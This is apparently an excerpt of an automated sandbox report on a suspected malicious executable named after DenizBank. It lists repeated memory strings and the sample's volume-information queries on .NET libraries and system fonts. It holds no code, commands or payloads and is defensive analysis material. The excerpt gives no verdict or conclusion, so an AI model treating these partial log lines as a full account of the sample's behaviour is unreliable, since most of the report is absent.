Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq0!!
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqdK
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqD.
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq4k-
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq<[
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq$*(
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqtH5
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq\x
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqDJ#
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq^;
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq\v
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq<V
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqXs%
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqh02
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqxPA
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq=1
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq(t4
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqT(:
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq<Q
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqL["
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqhQ<
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq8S*
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq\99
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq<C
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq,;'
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq|Y4
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqXs?
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq<:A
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq`"
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq\9>
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq<u
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqPcC
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq<g
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqPd0
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq #>
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqDK@
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqdJ=
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq<b
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq`C&
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq`A
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqT+#
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq`:
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq`3
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq`5
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq4n+
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqXu/
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqtl(
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq f3
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqDm7
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq`'
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqhT%
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqd:
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq(w2
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqL~6
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq\<"
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqx2<
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq !
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq@<
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq$-&
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq`]
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq`Y
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq|}'
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq@0
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq,>%
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqhT?
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq@+
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq`H
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq@(
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq@$
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq`C

Language, Device and Operating System Detection

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation			Jump to behavior
